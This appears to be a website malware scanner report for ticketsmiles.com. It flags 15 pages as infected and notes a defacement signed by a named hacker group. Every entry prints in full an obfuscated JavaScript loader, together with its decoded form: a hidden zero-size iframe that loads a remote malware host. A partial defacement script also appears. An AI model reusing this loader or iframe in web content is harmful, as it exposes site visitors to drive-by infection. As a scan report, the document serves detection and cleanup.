New scan:

Malware Scanner report for ticketsmiles.com

Malicious/Suspicious/Total urls checked
15/0/15
15 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

You got Hacked By 0p7!mu$ $p@rroW  (11 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://ticketsmiles.com/
200 OK
Content-Length: 28708
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

Deface/Content modification. The following signature was found: You got Hacked By 0p7!mu$ $p@rroW

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script language="JavaScript">


function tb5_makeArray(n){
this.length = n;
return this.length;
}

tb5_messages = new tb5_makeArray(5);
tb5_messages[0] = "You got Hacked By 0p7!mu$ $p@rroW";
tb5_messages[1] = "We are Bangladeshi Hacker";
tb5_messages[2] = "We love Bangladesh, We Love Hacking!";
tb5_messages[3] = "We Can Do Everything";
tb5_messages[4] = "For Our Country !";
tb5_messages[5] = "Don't worry! your all data base is safe!";
tb5_messages[6] = "We just Inform your site's security is too low";
tb5_messages[7] = "Fixed it as soon posible, else others hacker hacked y
...[31803 bytes skipped]...


http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20 <span>...69 symbols skipped</span>
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20 <span>...105 symbols skipped</span>
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20 <span>...141 symbols skipped</span>
200 OK
Content-Length: 28708
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


<iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe>

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ticketsmiles.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 20 Feb 2015 06:55:06 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: ticketsmiles.com
